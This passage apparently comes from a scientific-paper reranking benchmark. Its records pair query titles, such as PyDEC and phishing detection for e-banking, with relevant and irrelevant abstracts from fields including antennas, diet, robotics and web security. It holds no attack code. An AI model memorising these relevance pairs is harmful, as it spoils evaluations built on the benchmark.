"text": "This paper presents the analysis, design and measurement of novel, low-profile, small-footprint folded monopoles employing planar metamaterial phase-shifting lines. These lines are composed of fully-printed spiral elements, that are inductively coupled and hence exhibit an effective high- mu property. An equivalent circuit for the proposed structure is presented, validating the operating principles of the antenna and the metamaterial line. The impact of the antenna profile and the ground plane size on the antenna performance is investigated using accurate full-wave simulations. A lambda/9 antenna prototype, designed to operate at 2.36 GHz, is fabricated and tested on both electrically large and small ground planes, achieving on average 80% radiation efficiency, 5% (110 MHz) and 2.5% (55 MHz) -10 dB measured bandwidths, respectively, and fully omnidirectional, vertically polarized, monopole-type radiation patterns.",
"title": ""
},
{
"docid": "a9d92ae26a2e1023402c2c7c760b8074",
"text": "We examined the psychometric properties of the Big Five personality traits assessed through social networking profiles in 2 studies consisting of 274 and 244 social networking website (SNW) users. First, SNW ratings demonstrated sufficient interrater reliability and internal consistency. Second, ratings via SNWs demonstrated convergent validity with self-ratings of the Big Five traits. Third, SNW ratings correlated with job performance, hirability, and academic performance criteria; and the magnitude of these correlations was generally larger than for self-ratings. Finally, SNW ratings accounted for significant variance in the criterion measures beyond self-ratings of personality and cognitive ability. We suggest that SNWs may provide useful information for potential use in organizational research and practice, taking into consideration various legal and ethical issues.jasp_881 1..30",
"title": ""
}
] | scidocsrr |
fca8055920c4b47663301888f450b3b7 | PyDEC: Software and Algorithms for Discretization of Exterior Calculus | [
{
"docid": "ba48363904648269176e05cec16fcf7f",
"text": "We present a theory and applications of discrete exterior calculus on simplicial complexes of arbitrary finite dimension. This can be thought of as calculus on a discrete space. Our theory includes not only discrete differential forms but also discrete vector fields and the operators acting on these objects. This allows us to address the various interactions between forms and vector fields (such as Lie derivatives) which are important in applications. Previous attempts at discrete exterior calculus have addressed only differential forms. We also introduce the notion of a circumcentric dual of a simplicial complex. The importance of dual complexes in this field has been well understood, but previous researchers have used barycentric subdivision or barycentric duals. We show that the use of circumcentric duals is crucial in arriving at a theory of discrete exterior calculus that admits both vector fields and forms.",
"title": ""
}
] | [
{
"docid": "71da47c6837022a80dccabb0a1f5c00e",
"text": "The treatment of obesity and cardiovascular diseases is one of the most difficult and important challenges nowadays. Weight loss is frequently offered as a therapy and is aimed at improving some of the components of the metabolic syndrome. Among various diets, ketogenic diets, which are very low in carbohydrates and usually high in fats and/or proteins, have gained in popularity. Results regarding the impact of such diets on cardiovascular risk factors are controversial, both in animals and humans, but some improvements notably in obesity and type 2 diabetes have been described. Unfortunately, these effects seem to be limited in time. Moreover, these diets are not totally safe and can be associated with some adverse events. Notably, in rodents, development of nonalcoholic fatty liver disease (NAFLD) and insulin resistance have been described. The aim of this review is to discuss the role of ketogenic diets on different cardiovascular risk factors in both animals and humans based on available evidence.",
"title": ""
},
{
"docid": "a11c3f75f6ced7f43e3beeb795948436",
"text": "A new concept of building the controller of a thyristor based three-phase dual converter is presented in this paper. The controller is implemented using mixed mode digital-analog circuitry to achieve optimized performance. The realtime six state pulse patterns needed for the converter are generated by a specially designed ROM based circuit synchronized to the power frequency by a phase-locked-loop. The phase angle and other necessary commands for the converter are managed by an AT89C51 microcontroller. The proposed architecture offers 128-steps in the phase angle control, a resolution sufficient for most converter applications. Because of the hybrid nature of the implementation, the controller can change phase angles online smoothly. The computation burden on the microcontroller is nominal and hence it can easily undertake the tasks of monitoring diagnostic data like overload, loss of excitation and phase sequence. Thus a full fledged system is realizable with only one microcontroller chip, making the control system economic, reliable and efficient.",
"title": ""
},
{
"docid": "5d9d507a8bdd0d356d7ac220d9b0ef70",
"text": "This paper provides insights of possible plagiarism detection approach based on modern technologies – programming assignment versioning, auto-testing and abstract syntax tree comparison to estimate code similarities. Keywords—automation; assignment; testing; continuous integration INTRODUCTION In the emerging world of information technologies, a growing number of students is choosing this specialization for their education. Therefore, the number of homework and laboratory research assignments that should be tested is also growing. The majority of these tasks is based on the necessity to implement some algorithm as a small program. This article discusses the possible solutions to the problem of automated testing of programming laboratory research assignments. The course “Algorithmization and Programming of Solutions” is offered to all the first-year students of The Faculty of Computer Science and Information Technology (~500 students) in Riga Technical University and it provides the students the basics of the algorithmization of computing processes and the technology of program design using Java programming language (the given course and the University will be considered as an example of the implementation of the automated testing). During the course eight laboratory research assignments are planned, where the student has to develop an algorithm, create a program and submit it to the education portal of the University. The VBA test program was designed as one of the solutions, the requirements for each laboratory assignment were determined and the special tests have been created. At some point, however, the VBA offered options were no longer able to meet the requirements, therefore the activities on identifying the requirements for the automation of the whole cycle of programming work reception, testing and evaluation have begun. I. PLAGIARISM DETECTION APPROACHES To identify possible plagiarism detection techniques, it is imperative to define scoring or detecting threshold. Surely it is not an easy task, since only identical works can be considered as “true” plagiarism. In all other cases a person must make his decision whether two pieces of code are identical by their means or not. However, it is possible to outline some widespread approaches of assessment comparison. A. Manual Work Comparison In this case, all works must be compared one-by-one. Surely, this approach will lead to progressively increasing error rate due to human memory and cognitive function limitations. Large student group homework assessment verification can take long time, which is another contributing factor to errorrate increase. B. Diff-tool Application It is possible to compare two code fragments using semiautomated diff tool which provides information about Levenshtein distance between fragments. Although several visualization tools exist, it is quite easy to fool algorithm to believe that a code has multiple different elements in it, but all of them are actually another name for variables/functions/etc. without any additional contribution. C. Abstract Syntax Tree (AST) comparison Abstract syntax tree is a tree representation of the abstract syntactic structure of source code written in a programming language. Each node of the tree denotes a construct occurring in the source code. Example of AST is shown on Fig. 1.syntax tree is a tree representation of the abstract syntactic structure of source code written in a programming language. Each node of the tree denotes a construct occurring in the source code. 
Example of AST is shown on Fig. 1.",
"title": ""
},
{
"docid": "eb9973ea01e6d55eb19912d2a437af30",
"text": "Stochastic descent methods (of the gradient and mirror varieties) have become increasingly popular in optimization. In fact, it is now widely recognized that the success of deep learning is not only due to the special deep architecture of the models, but also due to the behavior of the stochastic descent methods used, which play a key role in reaching “good” solutions that generalize well to unseen data. In an attempt to shed some light on why this is the case, we revisit some minimax properties of stochastic gradient descent (SGD) for the square loss of linear models—originally developed in the 1990’s—and extend them to general stochastic mirror descent (SMD) algorithms for general loss functions and nonlinear models. In particular, we show that there is a fundamental identity which holds for SMD (and SGD) under very general conditions, and which implies the minimax optimality of SMD (and SGD) for sufficiently small step size, and for a general class of loss functions and general nonlinear models. We further show that this identity can be used to naturally establish other properties of SMD (and SGD), namely convergence and implicit regularization for over-parameterized linear models (in what is now being called the “interpolating regime”), some of which have been shown in certain cases in prior literature. We also argue how this identity can be used in the so-called “highly over-parameterized” nonlinear setting (where the number of parameters far exceeds the number of data points) to provide insights into why SMD (and SGD) may have similar convergence and implicit regularization properties for deep learning.",
"title": ""
},
{
"docid": "e5da4f6a9abd5f1c751a366768d8456c",
"text": "We report on the design, optimization, and performance evaluation of a new wheel-leg hybrid robot. This robot utilizes a novel transformable wheel that combines the advantages of both circular and legged wheels. To minimize the complexity of the design, the transformation process of the wheel is passive, which eliminates the need for additional actuators. A new triggering mechanism is also employed to increase the transformation success rate. To maximize the climbing ability in legged-wheel mode, the design parameters for the transformable wheel and robot are tuned based on behavioral analyses. The performance of our new development is evaluated in terms of stability, energy efficiency, and the maximum height of an obstacle that the robot can climb over. With the new transformable wheel, the robot can climb over an obstacle 3.25 times as tall as its wheel radius, without compromising its driving ability at a speed of 2.4 body lengths/s with a specific resistance of 0.7 on a flat surface.",
"title": ""
},
{
"docid": "d7b638eae20bc28e2042f4666ec1c97f",
"text": "Finding informative genes from microarray data is an important research problem in bioinformatics research and applications. Most of the existing methods rank features according to their discriminative capability and then find a subset of discriminative genes (usually top k genes). In particular, t-statistic criterion and its variants have been adopted extensively. This kind of methods rely on the statistics principle of t-test, which requires that the data follows a normal distribution. However, according to our investigation, the normality condition often cannot be met in real data sets.To avoid the assumption of the normality condition, in this paper, we propose a rank sum test method for informative gene discovery. The method uses a rank-sum statistic as the ranking criterion. Moreover, we propose using the significance level threshold, instead of the number of informative genes, as the parameter. The significance level threshold as a parameter carries the quality specification in statistics. We follow the Pitman efficiency theory to show that the rank sum method is more accurate and more robust than the t-statistic method in theory.To verify the effectiveness of the rank sum method, we use support vector machine (SVM) to construct classifiers based on the identified informative genes on two well known data sets, namely colon data and leukemia data. The prediction accuracy reaches 96.2% on the colon data and 100% on the leukemia data. The results are clearly better than those from the previous feature ranking methods. By experiments, we also verify that using significance level threshold is more effective than directly specifying an arbitrary k.",
"title": ""
},
{
"docid": "43dff9898114fa6fedecc9b54b8acc11",
"text": "In medical diagnostic application, early defect detection is a crucial task as it provides critical insight into diagnosis. Medical imaging technique is actively developing field inengineering. Magnetic Resonance imaging (MRI) is one those reliable imaging techniques on which medical diagnostic is based upon. Manual inspection of those images is a tedious job as the amount of data and minute details are hard to recognize by the human. For this automating those techniques are very crucial. In this paper, we are proposing a method which can be utilized to make tumor detection easier. The MRI deals with the complicated problem of brain tumor detection. Due to its complexity and variance getting better accuracy is a challenge. Using Adaboost machine learning algorithm we can improve over accuracy issue. The proposed system consists of three parts such as Preprocessing, Feature extraction and Classification. Preprocessing has removed noise in the raw data, for feature extraction we used GLCM (Gray Level Co- occurrence Matrix) and for classification boosting technique used (Adaboost).",
"title": ""
},
{
"docid": "7ab15804bd53aa8288aafc5374a12499",
"text": "We have used a modified technique in five patients to correct winging of the scapula caused by injury to the brachial plexus or the long thoracic nerve during transaxillary resection of the first rib. The procedure stabilises the scapulothoracic articulation by using strips of autogenous fascia lata wrapped around the 4th, 6th and 7th ribs at least two, and preferably three, times. The mean age of the patients at the time of operation was 38 years (26 to 47) and the mean follow-up six years and four months (three years and three months to 11 years). Satisfactory stability was achieved in all patients with considerable improvement in shoulder function. There were no complications.",
"title": ""
},
{
"docid": "67731fe25f024540a46b084f42271e70",
"text": "Obstacle avoidance is a fundamental requirement for autonomous robots which operate in, and interact with, the real world. When perception is limited to monocular vision avoiding collision becomes significantly more challenging due to the lack of 3D information. Conventional path planners for obstacle avoidance require tuning a number of parameters and do not have the ability to directly benefit from large datasets and continuous use. In this paper, a dueling architecture based deep double-Q network (D3QN) is proposed for obstacle avoidance, using only monocular RGB vision. Based on the dueling and double-Q mechanisms, D3QN can efficiently learn how to avoid obstacles in a simulator even with very noisy depth information predicted from RGB image. Extensive experiments show that D3QN enables twofold acceleration on learning compared with a normal deep Q network and the models trained solely in virtual environments can be directly transferred to real robots, generalizing well to various new environments with previously unseen dynamic objects.",
"title": ""
},
{
"docid": "40555c2dc50a099ff129f60631f59c0d",
"text": "As new technologies and information delivery systems emerge, the way in which individuals search for information to support research, teaching, and creative activities is changing. To understand different aspects of researchers’ information-seeking behavior, this article surveyed 2,063 academic researchers in natural science, engineering, and medical science from five research universities in the United States. A Web-based, in-depth questionnaire was designed to quantify researchers’ information searching, information use, and information storage behaviors. Descriptive statistics are reported.",
"title": ""
},
{
"docid": "c060f75acd562c535ad655f82fa1163b",
"text": "can be found at: Structural Health Monitoring Additional services and information for http://shm.sagepub.com/cgi/alerts Email Alerts: http://shm.sagepub.com/subscriptions Subscriptions: http://www.sagepub.com/journalsReprints.nav Reprints: http://www.sagepub.com/journalsPermissions.nav Permissions: http://shm.sagepub.com/cgi/content/refs/2/3/257 SAGE Journals Online and HighWire Press platforms): (this article cites 14 articles hosted on the Citations",
"title": ""
},
{
"docid": "f90bc248d18b2b37f37f762d758a4cb3",
"text": "postMessage is popular in HTML5 based web apps to allow the communication between different origins. With the increasing popularity of the embedded browser (i.e., WebView) in mobile apps (i.e., hybrid apps), postMessage has found utility in these apps. However, different from web apps, hybrid apps have a unique requirement that their native code (e.g., Java for Android) also needs to exchange messages with web code loaded in WebView. To bridge the gap, developers typically extend postMessage by treating the native context as a new frame, and allowing the communication between the new frame and the web frames. We term such extended postMessage \"hybrid postMessage\" in this paper. We find that hybrid postMessage introduces new critical security flaws: all origin information of a message is not respected or even lost during the message delivery in hybrid postMessage. If adversaries inject malicious code into WebView, the malicious code may leverage the flaws to passively monitor messages that may contain sensitive information, or actively send messages to arbitrary message receivers and access their internal functionalities and data. We term the novel security issue caused by hybrid postMessage \"Origin Stripping Vulnerability\" (OSV). In this paper, our contributions are fourfold. First, we conduct the first systematic study on OSV. Second, we propose a lightweight detection tool against OSV, called OSV-Hunter. Third, we evaluate OSV-Hunter using a set of popular apps. We found that 74 apps implemented hybrid postMessage, and all these apps suffered from OSV, which might be exploited by adversaries to perform remote real-time microphone monitoring, data race, internal data manipulation, denial of service (DoS) attacks and so on. Several popular development frameworks, libraries (such as the Facebook React Native framework, and the Google cloud print library) and apps (such as Adobe Reader and WPS office) are impacted. Lastly, to mitigate OSV from the root, we design and implement three new postMessage APIs, called OSV-Free. Our evaluation shows that OSV-Free is secure and fast, and it is generic and resilient to the notorious Android fragmentation problem. We also demonstrate that OSV-Free is easy to use, by applying OSV-Free to harden the complex \"Facebook React Native\" framework. OSV-Free is open source, and its source code and more implementation and evaluation details are available online.",
"title": ""
},
{
"docid": "18c56e9d096ba4ea48a0579626f83edc",
"text": "PURPOSE\nThe purpose of this study was to provide an overview of platelet-rich plasma (PRP) injected into the scalp for the management of androgenic alopecia.\n\n\nMATERIALS AND METHODS\nA literature review was performed to evaluate the benefits of PRP in androgenic alopecia.\n\n\nRESULTS\nHair restoration has been increasing. PRP's main components of platelet-derived growth factor, transforming growth factor, and vascular endothelial growth factor have the potential to stimulate hard and soft tissue wound healing. In general, PRP showed a benefit on patients with androgenic alopecia, including increased hair density and quality. Currently, different PRP preparations are being used with no standard technique.\n\n\nCONCLUSION\nThis review found beneficial effects of PRP on androgenic alopecia. However, more rigorous study designs, including larger samples, quantitative measurements of effect, and longer follow-up periods, are needed to solidify the utility of PRP for treating patients with androgenic alopecia.",
"title": ""
},
{
"docid": "87a296ad9c3dd7b32b7ed876b9132fb2",
"text": "Reservoir Computing is an attractive paradigm of recurrent neural network architecture, due to the ease of training and existing neuromorphic implementations. Successively applied on speech recognition and time series forecasting, few works have so far studied the behavior of such networks on computer vision tasks. Therefore we decided to investigate the ability of Echo State Networks to classify the digits of the MNIST database. We show that even if ESNs are not able to outperform state-of-the-art convolutional networks, they allow low error thanks to a suitable preprocessing of images. The best performance is obtained with a large reservoir of 4,000~neurons, but committees of smaller reservoirs are also appealing and might be further investigated.",
"title": ""
},
{
"docid": "f32477f15fb7f550c74bc052c487a14b",
"text": "This paper demonstrates the sketch drawing capability of NAO humanoid robot. Two redundant degrees of freedom elbow yaw (RElbowYaw) and wrist yaw (RWristYaw) of the right hand have been sacrificed because of their less contribution in drawing. The Denavit-Hartenberg (DH) parameters of the system has been defined in order to measure the working envelop of the right hand as well as to achieve the inverse kinematic solution. A linear transformation has been used to transform the image points with respect to real world coordinate system and novel 4 point calibration technique has been proposed to calibrate the real world coordinate system with respect to NAO end effector.",
"title": ""
},
{
"docid": "9e7998cce943fa2b60f4d4773bc51e40",
"text": "This paper presents a novel technique to correct for bias in a classical estimator using a learning approach. We apply a learned bias correction to a lidar-only motion estimation pipeline. Our technique trains a Gaussian process (GP) regression model using data with ground truth. The inputs to the model are high-level features derived from the geometry of the point-clouds, and the outputs are the predicted biases between poses computed by the estimator and the ground truth. The predicted biases are applied as a correction to the poses computed by the estimator. Our technique is evaluated on over 50km of lidar data, which includes the KITTI odometry benchmark and lidar datasets collected around the University of Toronto campus. After applying the learned bias correction, we obtained significant improvements to lidar odometry in all datasets tested. We achieved around 10% reduction in errors on all datasets from an already accurate lidar odometry algorithm, at the expense of only less than 1% increase in computational cost at run-time.",
"title": ""
},
{
"docid": "07d588e80307ef24a8644e453ff4dace",
"text": "This paper outlines the burden of oral diseases worldwide and describes the influence of major sociobehavioural risk factors in oral health. Despite great improvements in the oral health of populations in several countries, global problems still persist. The burden of oral disease is particularly high for the disadvantaged and poor population groups in both developing and developed countries. Oral diseases such as dental caries, periodontal disease, tooth loss, oral mucosal lesions and oropharyngeal cancers, human immunodeficiency virus/acquired immunodeficiency syndrome (HIV/AIDS)-related oral disease and orodental trauma are major public health problems worldwide and poor oral health has a profound effect on general health and quality of life. The diversity in oral disease patterns and development trends across countries and regions reflects distinct risk profiles and the establishment of preventive oral health care programmes. The important role of sociobehavioural and environmental factors in oral health and disease has been shown in a large number of socioepidemiological surveys. In addition to poor living conditions, the major risk factors relate to unhealthy lifestyles (i.e. poor diet, nutrition and oral hygiene and use of tobacco and alcohol), and limited availability and accessibility of oral health services. Several oral diseases are linked to noncommunicable chronic diseases primarily because of common risk factors. Moreover, general diseases often have oral manifestations (e.g. diabetes or HIV/AIDS). Worldwide strengthening of public health programmes through the implementation of effective measures for the prevention of oral disease and promotion of oral health is urgently needed. The challenges of improving oral health are particularly great in developing countries.",
"title": ""
},
{
"docid": "c8f97cc28c124f08c161898f1c1023ad",
"text": "Nonnegative matrix factorization (NMF) is a widely-used method for low-rank approximation (LRA) of a nonnegative matrix (matrix with only nonnegative entries), where nonnegativity constraints are imposed on factor matrices in the decomposition. A large body of past work on NMF has focused on the case where the data matrix is complete. In practice, however, we often encounter with an incomplete data matrix where some entries are missing (e.g., a user-rating matrix). Weighted low-rank approximation (WLRA) has been studied to handle incomplete data matrix. However, there is only few work on weighted nonnegative matrix factorization (WNMF) that is WLRA with nonnegativity constraints. Existing WNMF methods are limited to a direct extension of NMF multiplicative updates, which suffer from slow convergence while the implementation is easy. In this paper we develop relatively fast and scalable algorithms for WNMF, borrowed from well-studied optimization techniques: (1) alternating nonnegative least squares; (2) generalized expectation maximization. Numerical experiments on MovieLens and Netflix prize datasets confirm the useful behavior of our methods, in a task of collaborative prediction.",
"title": ""
},
{
"docid": "475fc34de30b8310a6eb2aba176f33fa",
"text": "A novel compact broadband water dense patch antenna with relatively thick air layer is introduced. The distilled water with high permittivity is located on the top of the low-loss, low-permittivity supporting substrate to provide an electric wall boundary. The dense water patch antenna is excited with cavity mode, reducing the impact of dielectric loss of the water on the antenna efficiency. The designs of loading the distilled water and T-shaped shorting sheet are applied for size reduction. The wide bandwidth is attributed to the coupling L-shaped probe, proper size of the coupled T-shaped shorting sheet, and thick air layer. As a result, the dimensions of the water patch are only 0.146 λ0 × 0.078 λ0 × 0.056 λ0. The proposed antenna has a high radiation up to 70% over the lower frequency band of 4G mobile communication from 690 to 960 MHz. Good agreements are achieved between the measured results and the simulated results.",
"title": ""
},
{
"docid": "b4d234b09b642b228e71bf3dee52ff62",
"text": "The Recurrent Neural Networks and their variants have shown promising performances in sequence modeling tasks such as Natural Language Processing. These models, however, turn out to be impractical and difficult to train when exposed to very high-dimensional inputs due to the large input-to-hidden weight matrix. This may have prevented RNNs’ large-scale application in tasks that involve very high input dimensions such as video modeling; current approaches reduce the input dimensions using various feature extractors. To address this challenge, we propose a new, more general and efficient approach by factorizing the input-to-hidden weight matrix using Tensor-Train decomposition which is trained simultaneously with the weights themselves. We test our model on classification tasks using multiple real-world video datasets and achieve competitive performances with state-of-the-art models, even though our model architecture is orders of magnitude less complex. We believe that the proposed approach provides a novel and fundamental building block for modeling highdimensional sequential data with RNN architectures and opens up many possibilities to transfer the expressive and advanced architectures from other domains such as NLP to modeling highdimensional sequential data.",
"title": ""
}
] | scidocsrr |
938cc882013afa3624e41bd3efff6988 | Modelling Intelligent Phishing Detection System for E-banking Using Fuzzy Data Mining | [
{
"docid": "816575ea7f7903784abba96180190ea3",
"text": "The decision tree output of Quinlan's ID3 algorithm is one of its major weaknesses. Not only can it be incomprehensible and difficult to manipulate, but its use in expert systems frequently demands irrelevant information to be supplied. This report argues that the problem lies in the induction algorithm itself and can only be remedied by radically altering the underlying strategy. It describes a new algorithm, PRISM which, although based on ID3, uses a different induction strategy to induce rules which are modular, thus avoiding many of the problems associated with decision trees.",
"title": ""
}
] | [
{
"docid": "147a8503cd6c3115e6ef881132df9df9",
"text": "Jitter and phase noise properties of phase-locked loops (PLL) are analyzed, identifying various forms of jitter and phase noise in PLLs. The effects of different building blocks on the jitter and phase noise performance of PLLs are demonstrated through a parallel analytical and graphical treatment of noise evolution in the phaselocked loop.",
"title": ""
},
{
"docid": "c4fa73bd2d6b06f4655eeacaddf3b3a7",
"text": "In recent years, the robotic research area has become extremely prolific in terms of wearable active exoskeletons for human body motion assistance, with the presentation of many novel devices, for upper limbs, lower limbs, and the hand. The hand shows a complex morphology, a high intersubject variability, and offers limited space for physical interaction with a robot: as a result, hand exoskeletons usually are heavy, cumbersome, and poorly usable. This paper introduces a novel device designed on the basis of human kinematic compatibility, wearability, and portability criteria. This hand exoskeleton, briefly HX, embeds several features as underactuated joints, passive degrees of freedom ensuring adaptability and compliance toward the hand anthropometric variability, and an ad hoc design of self-alignment mechanisms to absorb human/robot joint axes misplacement, and proposes a novel mechanism for the thumb opposition. The HX kinematic design and actuation are discussed together with theoretical and experimental data validating its adaptability performances. Results suggest that HX matches the self-alignment design goal and is then suited for close human-robot interaction.",
"title": ""
},
{
"docid": "c050cd384a1de34b0ba06c920c9634e6",
"text": "Grounding autonomous behavior in the nervous system is a fundamental challenge for neuroscience. In particular, self-organized behavioral development provides more questions than answers. Are there special functional units for curiosity, motivation, and creativity? This paper argues that these features can be grounded in synaptic plasticity itself, without requiring any higher-level constructs. We propose differential extrinsic plasticity (DEP) as a new synaptic rule for self-learning systems and apply it to a number of complex robotic systems as a test case. Without specifying any purpose or goal, seemingly purposeful and adaptive rhythmic behavior is developed, displaying a certain level of sensorimotor intelligence. These surprising results require no system-specific modifications of the DEP rule. They rather arise from the underlying mechanism of spontaneous symmetry breaking, which is due to the tight brain body environment coupling. The new synaptic rule is biologically plausible and would be an interesting target for neurobiological investigation. We also argue that this neuronal mechanism may have been a catalyst in natural evolution.",
"title": ""
},
{
"docid": "4c8b9d516d51df943d4c11da9cc092cf",
"text": "Cloud monitoring and analysis are challenging tasks that have recently been addressed by Complex Event Processing (CEP) techniques. CEP systems can process many incoming event streams and execute continuously running queries to analyze the behavior of a Cloud. Based on a Cloud performance monitoring and analysis use case, this paper experimentally evaluates different CEP architectures in terms of precision, recall and other performance indicators. The results of the experimental comparison are used to propose a novel dynamic CEP architecture for Cloud monitoring and analysis. The novel dynamic CEP architecture is designed to dynamically switch between different centralized and distributed CEP architectures depending on the current machine load and network traffic conditions in the observed Cloud environment.",
"title": ""
},
{
"docid": "0110e37c5525520a4db4b1a775dacddd",
"text": "This paper presents a study of Linux API usage across all applications and libraries in the Ubuntu Linux 15.04 distribution. We propose metrics for reasoning about the importance of various system APIs, including system calls, pseudo-files, and libc functions. Our metrics are designed for evaluating the relative maturity of a prototype system or compatibility layer, and this paper focuses on compatibility with Linux applications. This study uses a combination of static analysis to understand API usage and survey data to weight the relative importance of applications to end users.\n This paper yields several insights for developers and researchers, which are useful for assessing the complexity and security of Linux APIs. For example, every Ubuntu installation requires 224 system calls, 208 ioctl, fcntl, and prctl codes and hundreds of pseudo files. For each API type, a significant number of APIs are rarely used, if ever. Moreover, several security-relevant API changes, such as replacing access with faccessat, have met with slow adoption. Finally, hundreds of libc interfaces are effectively unused, yielding opportunities to improve security and efficiency by restructuring libc.",
"title": ""
},
{
"docid": "1926781cea974f3bcec281e1fca2a2e4",
"text": "................................................................................. 4 KOKKUVÕTE............................................................................... 5 ACKNOWLEDGEMENTS ............................................................ 6 PART I OVERVIEW.................................................................... 7",
"title": ""
},
{
"docid": "6b3c8e869651690193e66bc2524c1f56",
"text": "Convolutional Neural Networks (CNNs) have been widely used for face recognition and got extraordinary performance with large number of available face images of different people. However, it is hard to get uniform distributed data for all people. In most face datasets, a large proportion of people have few face images. Only a small number of people appear frequently with more face images. These people with more face images have higher impact on the feature learning than others. The imbalanced distribution leads to the difficulty to train a CNN model for feature representation that is general for each person, instead of mainly for the people with large number of face images. To address this challenge, we proposed a center invariant loss which aligns the center of each person to enforce the learned features to have a general representation for all people. The center invariant loss penalizes the difference between each center of classes. With center invariant loss, we can train a robust CNN that treats each class equally regardless the number of class samples. Extensive experiments demonstrate the effectiveness of the proposed approach. We achieve state-of-the-art results on LFW and YTF datasets.",
"title": ""
},
{
"docid": "719794106634ad35bedce96305bef83a",
"text": "With recent advances in mobile computing, the demand for visual localization or landmark identification on mobile devices is gaining interest. We advance the state of the art in this area by fusing two popular representations of street-level image data — facade-aligned and viewpoint-aligned — and show that they contain complementary information that can be exploited to significantly improve the recall rates on the city scale. We also improve feature detection in low contrast parts of the street-level data, and discuss how to incorporate priors on a user's position (e.g. given by noisy GPS readings or network cells), which previous approaches often ignore. Finally, and maybe most importantly, we present our results according to a carefully designed, repeatable evaluation scheme and make publicly available a set of 1.7 million images with ground truth labels, geotags, and calibration data, as well as a difficult set of cell phone query images. We provide these resources as a benchmark to facilitate further research in the area.",
"title": ""
},
{
"docid": "6b527c906789f6e32cd5c28f684d9cc8",
"text": "This paper addresses an essential application of microkernels; its role in virtualization for embedded systems. Virtualization in embedded systems and microkernel-based virtualization are topics of intensive research today. As embedded systems specifically mobile phones are evolving to do everything that a PC does, employing virtualization in this case is another step to make this vision a reality. Hence, recently, much time and research effort have been employed to validate ways to host virtualization on embedded system processors i.e., the ARM processors. This paper reviews the research work that have had significant impact on the implementation approaches of virtualization in embedded systems and how these approaches additionally provide security features that are beneficial to equipment manufacturers, carrier service providers and end users.",
"title": ""
},
{
"docid": "3792c6e065227cdbe8a9f87882224891",
"text": "The increasing size of workloads has led to the development of new technologies and architectures that are intended to help address the capacity limitations of DRAM main memories. The proposed solutions fall into two categories: those that re-engineer Flash-based SSDs to further improve storage system performance and those that incorporate non-volatile technology into a Hybrid main memory system. These developments have blurred the line between the storage and memory systems. In this paper, we examine the differences between these two approaches to gain insight into the types of applications and memory technologies that benefit the most from these different architectural approaches.\n In particular this work utilizes full system simulation to examine the impact of workload randomness on system performance, the impact of backing store latency on system performance, and how the different implementations utilize system resources differently. We find that the software overhead incurred by storage based implementations can account for almost 50% of the overall access latency. As a result, backing store technologies that have an access latency up to 25 microseconds tend to perform better when implemented as part of the main memory system. We also see that high degrees of random access can exacerbate the software overhead problem and lead to large performance advantages for the Hybrid main memory approach. Meanwhile, the page replacement algorithm utilized by the OS in the storage approach results in considerably better performance on highly sequential workloads at the cost of greater pressure on the cache.",
"title": ""
},
{
"docid": "2aea197bd094643ecc735b604501b602",
"text": "OBJECTIVE\nTo update previous meta-analyses of cohort studies that investigated the association between the Mediterranean diet and health status and to utilize data coming from all of the cohort studies for proposing a literature-based adherence score to the Mediterranean diet.\n\n\nDESIGN\nWe conducted a comprehensive literature search through all electronic databases up to June 2013.\n\n\nSETTING\nCohort prospective studies investigating adherence to the Mediterranean diet and health outcomes. Cut-off values of food groups used to compute the adherence score were obtained.\n\n\nSUBJECTS\nThe updated search was performed in an overall population of 4 172 412 subjects, with eighteen recent studies that were not present in the previous meta-analyses.\n\n\nRESULTS\nA 2-point increase in adherence score to the Mediterranean diet was reported to determine an 8 % reduction of overall mortality (relative risk = 0·92; 95 % CI 0·91, 0·93), a 10 % reduced risk of CVD (relative risk = 0·90; 95 % CI 0·87, 0·92) and a 4 % reduction of neoplastic disease (relative risk = 0·96; 95 % CI 0·95, 0·97). We utilized data coming from all cohort studies available in the literature for proposing a literature-based adherence score. Such a score ranges from 0 (minimal adherence) to 18 (maximal adherence) points and includes three different categories of consumption for each food group composing the Mediterranean diet.\n\n\nCONCLUSIONS\nThe Mediterranean diet was found to be a healthy dietary pattern in terms of morbidity and mortality. By using data from the cohort studies we proposed a literature-based adherence score that can represent an easy tool for the estimation of adherence to the Mediterranean diet also at the individual level.",
"title": ""
},
{
"docid": "45b082ddf4a813d6b95098ef5592bafc",
"text": "Estimating the frequencies of elements in a data stream is a fundamental task in data analysis and machine learning. The problem is typically addressed using streaming algorithms which can process very large data using limited storage. Today’s streaming algorithms, however, cannot exploit patterns in their input to improve performance. We propose a new class of algorithms that automatically learn relevant patterns in the input data and use them to improve its frequency estimates. The proposed algorithms combine the benefits of machine learning with the formal guarantees available through algorithm theory. We prove that our learning-based algorithms have lower estimation errors than their non-learning counterparts. We also evaluate our algorithms on two real-world datasets and demonstrate empirically their performance gains.",
"title": ""
},
{
"docid": "aa19ed0407ded7ff199310c69ed49229",
"text": "Due to the revolutionary advances of deep learning achieved in the field of image processing, speech recognition and natural language processing, the deep learning gains much attention. The recommendation task is influenced by the deep learning trend which shows its significant effectiveness and the high-quality of recommendations. The deep learning based recommender models provide a better detention of user preferences, item features and users-items interactions history. In this paper, we provide a recent literature review of researches dealing with deep learning based recommendation approaches which are preceded by a presentation of the main lines of the recommendation approaches and the deep learning techniques. We propose also classification criteria of the different deep learning integration model. Then we finish by presenting the recommendation approach adopted by the most popular video recommendation platform YouTube which is based essentially on deep learning advances. Keywords—Recommender system; deep learning; neural network; YouTube recommendation",
"title": ""
},
{
"docid": "ae218abd859370a093faf83d6d81599d",
"text": "In this letter, we present an autofocus routine for backprojection imagery from spotlight-mode synthetic aperture radar data. The approach is based on maximizing image sharpness and supports the flexible collection and imaging geometries of BP, including wide-angle apertures and the ability to image directly onto a digital elevation map. While image-quality-based autofocus approaches can be computationally intensive, in the backprojection setting, we demonstrate a natural geometric interpretation that allows for optimal single-pulse phase corrections to be derived in closed form as the solution of a quartic polynomial. The approach is applicable to focusing standard backprojection imagery, as well as providing incremental focusing in sequential imaging applications based on autoregressive backprojection. An example demonstrates the efficacy of the approach applied to real data for a wide-aperture backprojection image.",
"title": ""
},
{
"docid": "02289353fde7c497bed01195afd020dc",
"text": "In this paper, an electrical equivalent circuit for a proton exchange membrane (PEM) electrolyzer is used to develop a Simulink block diagram. The I-V characteristic for a single PEM electrolyzer cell is modeled under a steady-state and elaborated using an electrical equivalent circuit. Hydrogen production rates characteristics are developed with respect to the input current and power. It is clearly seen that the electrolytic hydrogen production rate increases with the input current in a linear fashion and the variation of hydrogen production rate with the input electrical power is non-linear (i.e. logarithmic). These characteristics are simulated using the developed Simulink/Matlab model of PEM electrolyzer cell. The parameters of the developed model can also be defined by taking into account temperature and pressure effects.",
"title": ""
